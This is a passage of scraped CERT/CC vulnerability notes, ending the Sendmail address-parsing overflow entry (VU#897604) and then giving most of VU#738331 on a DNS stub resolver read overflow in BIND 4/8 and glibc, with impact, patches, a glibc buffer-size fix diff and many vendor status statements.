CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ Secure Computing Corporation\n\nNotified: March 29, 2003 Updated: March 29, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ Sony Corporation\n\nNotified: March 29, 2003 Updated: March 29, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ Unisys\n\nNotified: March 29, 2003 Updated: March 29, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\nView all 46 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.securityfocus.com/archive/1/316773/2003-03-28/2003-04-03/0>\n * <http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=22127>\n * <http://www.sendmail.org/secure-install.html>\n * <http://www.sendmail.org/ftp/RELEASE_NOTES>\n * <http://www.ietf.org/rfc/rfc2047.txt>\n\n### Acknowledgements\n\nThis vulnerability was discovered by Michal Zalewski and reported by Sendmail Inc. \n\nThis document was written by Art Manion. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2003-0161](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0161>) \n---|--- \n**CERT Advisory:** | [CA-2003-12 ](<http://www.cert.org/advisories/CA-2003-12.html>) \n**Severity Metric:****** | 67.20 \n**Date Public:** | 2003-03-29 \n**Date First Published:** | 2003-03-29 \n**Date Last Updated: ** | 2003-09-25 05:19 UTC \n**Document Revision: ** | 38 \n", "modified": "2003-09-25T05:19:00", "published": "2003-03-29T00:00:00", "id": "VU:897604", "href": "https://www.kb.cert.org/vuls/id/897604", "type": "cert", "title": "Sendmail address parsing buffer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T20:44:57", "bulletinFamily": "info", "description": "### Overview \n\nDNS stub resolvers from multiple vendors contain a buffer overflow vulnerability. The impact of this vulnerability appears to be limited to denial of service.\n\n### Description \n\nA read buffer overflow vulnerability exists in BIND 4 and BIND 8.2.x stub resolver libraries. Other resolver libraries derived from BIND 4 are also affected, including BSD libc, GNU/Linux glibc, and System 5 UNIX libresolv. This vulnerability is similar in scope to [VU#803539](<http://www.kb.cert.org/vuls/id/803539>) and [VU#542971](<http://www.kb.cert.org/vuls/id/542971>), which are referenced by CERT Advisory [CA-2002-19](<http://www.cert.org/advisories/CA-2002-19.html>).\n\nThe name server itself, named, is not affected. The vulnerability exists in DNS stub resolver libraries that are used by network applications to obtain host or network information, typically host names and IP addresses. For example, when a web browser attempts to access <http://www.cert.org/>, it calls functions in a DNS stub resolver library in order to determine an IP address for www.cert.org. \n \nWithin the DNS resolver library, a buffer size value that is smaller than the maximum size of a potential DNS response is passed to the functions that perform DNS resolution. If a response is encountered that is larger than the allocated buffer, the response is truncated and returned to the calling function, along with the amount of buffer space that would be required to handle the entire response. The calling function may use this value for the size of the buffer and read beyond the end of the actual DNS response. In some cases, unmapped memory may be read, which typically causes the calling application to crash. In other cases, mapped memory may be read, and the contents included in the DNS response, which the calling application typically handles as a malformed response. \n \nApplications that call DNS resolution functions directly may also be vulnerable, depending on how those applications handle the returned buffer size value. MIT Kerberos 5, KTH Heimdal Kerberos, nss_ldap, and fetchmail are known to be affected. \n \nQuoting from the ISC advisory: \n \n_When looking up address (gethostbyname(), gethostbyaddr() etc.) a less than maximum sized buffer is passed to res_search() / res_query(). If the answer is too large to fit in the buffer the size of buffer required is returned along with the part of the message that will fit. This value is not checked and is passed to getanswer which then may read past the end of the buffer depending up the contents in the answer section__._ \n \n--- \n \n### Impact \n\nAn attacker who is able to send DNS responses to a vulnerable system could cause a denial of service, crashing the application that made calls to a vulnerable resolver library. It does not appear that this vulnerability can be leveraged to execute arbitrary code. There may be some risk of information disclosure if a vulnerable system returns the contents of memory adjacent to a DNS response. \n \n--- \n \n### Solution \n\n**Patch or Upgrade** \n \nApply a patch or upgrade as specified by your vendor. In the case of statically linked binaries, it is necessary to recompile using the patched version of the DNS stub resolver libraries. ISC has provided the following guidance for applications that call DNS resolution functions directly: \n \n_For application writers. Use a maximum sized buffer (64k), be prepared to redo the calls res_search(), res_query(), res_send(), res_nsearch(), res_nquery() and res_send() with a bigger buffer or take the minimum of the answer buffer size and the value returned by these calls and be aware that the answer is truncated._ \n \n--- \n \n**Local Caching DNS Server Not Effective** \n \nA local caching DNS server will not prevent malicious responses from reaching vulnerable client resolvers. \n \n--- \n \n### Vendor Information\n\n738331\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Conectiva\n\nNotified: August 15, 2002 Updated: November 08, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease reference the following Conectiva Linux Announcements (English): [CLSA-2002:535](<http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000535&idioma=en>) (glibc) and [CLSA-2002:531](<http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000531&idioma=en>) (fetchmail).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ Debian\n\nNotified: August 15, 2002 Updated: November 08, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nMost Linux distributions include the GNU glibc library that contains vulnerable DNS resolver functions. Debian Security Advisory [DSA-178](<http://www.debian.org/security/2002/dsa-178>) (superseded by [DSA-185](<http://www.debian.org/security/2002/dsa-185>)) addresses this issue in Heimdal Kerberos. See also:\n\n<http://security.debian.org/pool/updates/main/h/heimdal/heimdal_0.2l-7.6.diff.gz> \n \nDebian Security Advisory [DSA-171](<http://www.debian.org/security/2002/dsa-171>) addresses this issue in fetchmail.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ Fetchmail\n\nUpdated: October 18, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ FreeBSD\n\nNotified: August 15, 2002 Updated: November 13, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nPlease see [FreeBSD-SA-02:42.resolv](<ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:42.resolv.asc>).\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ Fujitsu\n\nNotified: August 15, 2002 Updated: October 16, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nFujitsu's UXP/V operating system is vulnerable to the bug reported in VU#738331.\n\nBug fixes are currently being developed and will be available in November, 2002. \n \nThe bug fix no. for UXP/V V20L10 is UX28292. \n \nThe bug fix no. for UXP/V V10L20 is UX15055.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ GNU glibc\n\nNotified: August 15, 2002 Updated: October 16, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nVersion 2.2.5 of the GNU C Library is vulnerable. The following patch has been installed into the CVS sources, and should appear in the next version.\n\n`2002-09-04 Roland McGrath <roland@redhat.com>` \n \n` * resolv/nss_dns/dns-network.c (MAXPACKET): Increase minimum value` \n` from 1024 to 65536, to avoid buffer overrun.` \n \n`2002-08-24 Ulrich Drepper <drepper@redhat.com>` \n \n` * resolv/nss_dns/dns-host.c (MAXPACKET): Likewise.` \n \n`2002-08-16 Paul Eggert <eggert@twinsun.com>` \n \n` * resolv/gethnamaddr.c (MAXPACKET): Likewise.` \n` * resolv/res_query.c (MAXPACKET): Likewise.` \n \n`===================================================================` \n`RCS file: /cvs/glibc/libc/resolv/nss_dns/dns-network.c,v` \n`retrieving revision 1.12` \n`retrieving revision 1.13` \n`diff -u -r1.12 -r1.13` \n`--- libc/resolv/nss_dns/dns-network.c 2002/08/26 06:20:05 1.12` \n`+++ libc/resolv/nss_dns/dns-network.c 2002/09/05 01:23:06 1.13` \n`@@ -70,10 +70,10 @@` \n` #define MAX_NR_ALIASES 48` \n \n \n`-#if PACKETSZ > 1024` \n`-#define MAXPACKET PACKETSZ` \n`+#if PACKETSZ > 65536` \n`+# define MAXPACKET PACKETSZ` \n` #else` \n`-#define MAXPACKET 1024` \n`+# define MAXPACKET 65536` \n` #endif` \n \n`===================================================================` \n`RCS file: /cvs/glibc/libc/resolv/nss_dns/dns-host.c,v` \n`retrieving revision 1.32` \n`retrieving revision 1.33` \n`diff -u -r1.32 -r1.33` \n`--- libc/resolv/nss_dns/dns-host.c 2002/08/03 03:42:06 1.32` \n`+++ libc/resolv/nss_dns/dns-host.c 2002/08/24 22:29:11 1.33` \n`@@ -92,10 +92,10 @@` \n` #define MAX_NR_ALIASES 48` \n` #define MAX_NR_ADDRS 48` \n \n`-#if PACKETSZ > 1024` \n`+#if PACKETSZ > 65536` \n` # define MAXPACKET PACKETSZ` \n` #else` \n`-# define MAXPACKET 1024` \n`+# define MAXPACKET 65536` \n` #endif` \n` /* As per RFC 1034 and 1035 a host name cannot exceed 255 octets in length. */` \n` #ifdef MAXHOSTNAMELEN` \n`===================================================================` \n`RCS file: /cvs/glibc/libc/resolv/gethnamaddr.c,v` \n`retrieving revision 1.39` \n`retrieving revision 1.40` \n`diff -u -r1.39 -r1.40` \n`--- libc/resolv/gethnamaddr.c 2002/08/03 03:40:54 1.39` \n`+++ libc/resolv/gethnamaddr.c 2002/08/24 22:29:11 1.40` \n`@@ -115,10 +115,10 @@` \n` extern void addrsort __P((char **, int));` \n` #endif` \n \n`-#if PACKETSZ > 1024` \n`+#if PACKETSZ > 65536` \n` #define MAXPACKET PACKETSZ` \n` #else` \n`-#define MAXPACKET 1024` \n`+#define MAXPACKET 65536` \n` #endif` \n \n` /* As per RFC 1034 and 1035 a host name cannot exceed 255 octets in length. */` \n`===================================================================` \n`RCS file: /cvs/glibc/libc/resolv/res_query.c,v` \n`retrieving revision 1.16` \n`retrieving revision 1.17` \n`diff -u -r1.16 -r1.17` \n`--- libc/resolv/res_query.c 2001/01/08 17:55:24 1.16` \n`+++ libc/resolv/res_query.c 2002/08/24 22:29:11 1.17` \n`@@ -85,10 +85,10 @@` \n` /* Options. Leave them on. */` \n` /* #undef DEBUG */` \n \n`-#if PACKETSZ > 1024` \n`+#if PACKETSZ > 65536` \n` #define MAXPACKET PACKETSZ` \n` #else` \n`-#define MAXPACKET 1024` \n`+#define MAXPACKET 65536` \n` #endif` \n \n` /*`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ Guardian Digital Inc.\n\nNotified: August 15, 2002 Updated: October 10, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSee [ESA-20021003-021](<http://www.linuxsecurity.com/advisories/other_advisory-2399.html>).\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nMost Linux distributions include the GNU glibc library that contains vulnerable DNS resolver functions.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ Hewlett-Packard Company\n\nNotified: August 15, 2002 Updated: April 15, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nHP Secure OS Software for Linux is affected. Please reference the following documents: HPSBTL0210-071 (fetchmail), HPSBTL0210-070 (nss_ldap), and HPSBTL0210-069/HPSBTL0211-0075 (glibc).\n\nSee also HPSBUX0208-209/SSRT2316.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ Hitachi\n\nNotified: August 27, 2002 Updated: November 08, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nDNS resolver included in GR2000 router is potentially vulnerable to this problem. All ROUTE-OS software from the version 02-03 is affected. Below is the release schedule for the fixed version of software.\n\nFixed software version : 06-05-/E \nRelease date : September 12, 2002 \nPlease see \n \n<http://www.hitachi.co.jp/Prod/comp/network/notice/20020911_0_E.html> \nfor more information.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ IBM\n\nNotified: August 15, 2002 Updated: October 16, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nThe AIX operating system is vulnerable to a buffer overflow in the res_nsend() resolver function, as mentioned above, in releases 4.3.3 and 5.1.0. This problem was discovered and fixed earlier while investigating a core dump from the \"host\" command.\n\nThe following APAR's are available for this fix: \n \nAIX 4.3.3: IY31886 \n \nAIX 5.1.0: IY31889 \nThe APAR's can be downloaded by going to the following URL, then following the links for your system release level. \n \n<http://techsupport.services.ibm.com/servers/fixes?view=pseries>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ ISC\n\nUpdated: October 16, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`Internet Software Consortium Security Advisary. \nLIBBIND/LIBRESOLV: Denial of Service. \n8 August 2002 \n`\n\n`Versions affected: \nBIND 4 prior to 4.9.10 \nBIND 8 prior to 8.2.5 \nSeverity: SERIOUS \nExploitable: Remotely \nType: Denial of service \n` \n`Description: \n` \n`When looking up address (gethostbyname(), gethostbyaddr() \netc.) a less than maximum sized buffer is passed to \nres_search() / res_query(). If the answer is too large \nto fit in the buffer the size of buffer required is \nreturned along with the part of the message that will fit. \nThis value is not checked and is passed to getanswer which \nthen may read past the end of the buffer depending up the \ncontents in the answer section. \n` \n`THIS DOES NOT AFFECT THE NAMESERVER. \n` \n`THIS CAN BE TRANSMITTED THROUGH CACHES. \n` \n`BIND 9 is NOT affected. \nBIND 8.3.x is NOT affected. \n` \n`This bug may exist in other applications that call the \nDNS directly. \n` \n`Workarounds: \n` \n`None. Upgrade and re-linking required. \n` \n`Impact: \n` \n`Applications linked against vulnerable versions of the \nlibraries may die with segmentation violations / \nbus errors. \n` \n`Fix:` \n` \nUpgrade to BIND 4.9.10 or preferably BIND 8.3.3. \n` \n`BIND 4 is officially deprecated. Only security \nfixes will be issued for BIND 4. \n` \n[`http://www.isc.org/products/BIND`](<http://www.isc.org/products/BIND>)` \n` \n`For application writers. Use a maximum sized buffer (64k), \nbe prepared to redo the calls res_search(), res_query(), \nres_send(), res_nsearch(), res_nquery() and res_send() \nwith a bigger buffer or take the minimum of the answer \nbuffer size and the value returned by these calls and \nbe aware that the answer is truncated.`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ Juniper Networks\n\nNotified: August 15, 2002 Updated: October 16, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nJuniper Networks has determined that its JUNOS Internet Software, used on the M- and T-series of router products, is susceptible to this vulnerability in versions 5.2R1.4, 5.2R2.3, 5.2R3.4, 5.2R4.4, 5.3R1.2, 5.3R2.4, 5.3R3.3, and 5.4R1.4. Customers should contact Juniper or their Juniper reseller to obtain an updated version of JUNOS software.\n\nJuniper Networks has determined that the operating software used on the ERX router products is not susceptible to this vulnerability. No software upgrade is required. However, the SDX-300 Service Deployment system may be susceptible if it is installed on a susceptible host platform. Users of SDX-300 should contact their host operating system vendor regarding this advisory. \n \nThe Juniper Networks G10 CMTS product is not susceptible to this vulnerability. No upgrade is required.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ KAME Project\n\nUpdated: October 01, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nThe problem was fixed in the KAME tree on August 27, 2002.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ MIT Kerberos Development Team\n\nNotified: August 23, 2002 Updated: October 16, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nWe don't ship a resolver implementation as part of MIT krb5. Our code does call res_search() in a potentially unsafe manner, but seems to only result in a read overrun. Also, it is primarily client-side code that calls res_search(), so denial of service attacks against servers are unlikely.\n\nThis will be fixed in an upcoming release of MIT krb5. The MIT Kerberos Team is not issuing a patch at this time, as we believe that the vulnerability is limited to a client-side denial of service.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ MandrakeSoft\n\nNotified: August 15, 2002 Updated: November 08, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nMandrake Linux 7.1 and 7.2, which ship with BIND 8.x, already have been updated to BIND version 8.3.3, which is not vulnerable to this problem. Mandrake Linux 8.0 and higher ship with BIND 9.x which is also not vulnerable.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nMost Linux distributions include the GNU glibc library that contains vulnerable DNS resolver functions. MandrakeSoft has also released [MDKSA-2002:063](<http://www.mandrakesecure.net/en/advisories/2002/MDKSA-2002-063.php>) (fetchmail) and [MDKSA-2002:075](<http://www.mandrakesecure.net/en/advisories/2002/MDKSA-2002-075.php>) (nss_ldap).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ MetaSolv Software Inc.\n\nNotified: August 15, 2002 Updated: October 01, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nThe resolver code embedded in the DNS Server (Based on ISC BIND 8.2.3) on both MetaSolv Policy Services 4.1 and 4.2 are open to Vulnerability Note VU#738331. This issue is being tracked by MetaSolv under Case #28230. An upgrade to ISC BIND 8.2.6 and the ISC Sanctioned Patches to 8.2.6 for this advisory have been compiled and applied, and will be available in Policy Services 4.2 Service Pack 1 efix 1. Please contact MetaSolv Global Customer Care ([supporthd@metasolv.com](<mailto:supporthd@metasolv.com>)) for availability and assistance.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ NetBSD\n\nNotified: August 15, 2002 Updated: October 10, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSee NetBSD Security Advisory [SA2002-015](<ftp://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2002-015.txt.asc>) for details.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ Nortel Networks\n\nNotified: August 15, 2002 Updated: November 08, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNortel Networks has determined that NetID version 4.3.1 and later is potentially affected by the vulnerability identified in CERT/CC Vulnerability Note VU#738331; a bulletin and patch are available from the following Nortel Networks support contacts:\n\nNorth America: 1-8004NORTEL or 1-800-466-7835 \nEurope, Middle East and Africa: 00800 8008 9009, or +44 (0) 870 907 9009 \n \nContacts for other regions are available at \n \n[www.nortelnetworks.com/help/contact/global/](<http://www.nortelnetworks.com/help/contact/global/>) \n \nOptivity NMS is not affected. \n \nThe former Nortel Networks product Preside Policy Server divested to MetaSolv Software, Inc. in February 2002 uses BIND 8 and may be potentially affected. Please refer to MetaSolv Software Inc.'s Vendor Statement.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ Openwall GNU/*/Linux\n\nNotified: August 15, 2002 Updated: October 16, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nOpenwall GNU/*/Linux's glibc package was affected. As a workaround, we have applied the patch by Olaf Kirch of SuSE which limits the return value from res_send(3) to be no greater than the provided answer buffer size. This approach has the advantage of reducing the problem for poorly written third-party applications, including those which aren't a part of our distribution. At the same time, checks have also been added to avoid some potential reads beyond end of undersized DNS responses as pointed out by Dmitry V. Levin of ALT Linux. This change will be documented in the system-wide change log:\n\n<http://www.openwall.com/Owl/CHANGES.shtml> \n \nThe BIND 4.9.x Openwall patch (which adds a number of security-related features) has been updated to the upcoming 4.9.10 release and will be made available at: \n \n<http://www.openwall.com/bind/>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ Red Hat Inc.\n\nNotified: August 15, 2002 Updated: November 08, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nAll supported versions of Red Hat Linux which shipped with vulnerable versions of BIND were updated to BIND 9.x by a previous security errata issued in August 2002 and are therefore not vulnerable to this issue. Users of the Red Hat Network can make sure their systems are updated to this release using the 'up2date' tool.\n\n<http://rhn.redhat.com/errata/RHSA-2002-133.html>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRed Hat has also released [RHSA-2002:197](<http://rhn.redhat.com/errata/RHSA-2002-197.html>) (glibc), [RHSA-2002:215](<http://rhn.redhat.com/errata/RHSA-2002-215.html>) (fetchmail), and [RHSA-2002:175](<http://rhn.redhat.com/errata/RHSA-2002-175.html>) (nss_ldap).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ SuSE Inc.\n\nNotified: August 15, 2002 Updated: October 25, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nAll SuSE versions of bind8 are affected by the bug in res_search/res_query. Fixed packages will be provided at 2002-10-01.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSuSE Security Announcement [SuSE-SA:2002:034](<http://www.suse.com/de/security/2002_034_heimdal.html>) addresses this issue in Heimdal Kerberos.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ Sun Microsystems Inc.\n\nNotified: August 15, 2002 Updated: November 08, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nThe Solaris DNS resolver library (libresolv.so) is affected by this issue in the following versions of Solaris:\n\nSolaris 2.5.1, 2.6, 7, and 8 \nPatches have been generated for all of the above releases. Sun has published Sun Alert 45463 for this issue which is available from: \n \n<http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F45463> \nThe patches for this issue are available from: \n \n<http://sunsolve.sun.com/securitypatch>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ Xerox Corporation\n\nNotified: August 15, 2002 Updated: April 15, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nA response to this vulnerability is available from our web site:\n\n<http://www.xerox.com/security/>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ Apple Computer Inc.\n\nNotified: August 15, 2002 Updated: August 23, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nMac OS X and Mac OS X Server do not contain the vulnerability described in this report.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ Computer Associates\n\nNotified: August 15, 2002 Updated: October 01, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nWe do not ship a resolver implementation or utilize the resolver library calls (i.e., res_*) but do utilize other native calls (e.g., gethostbyname(), gethostbyaddr() etc.) for translations.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ GNU adns\n\nNotified: August 15, 2002 Updated: October 03, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ Lucent Technologies\n\nNotified: August 15, 2002 Updated: August 21, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nLMG is not affected by the bind vulnerability. LMG uses BIND 9.2.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ Microsoft Corporation\n\nNotified: August 15, 2002 Updated: August 23, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nMicrosoft does not use BIND resolver code.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ 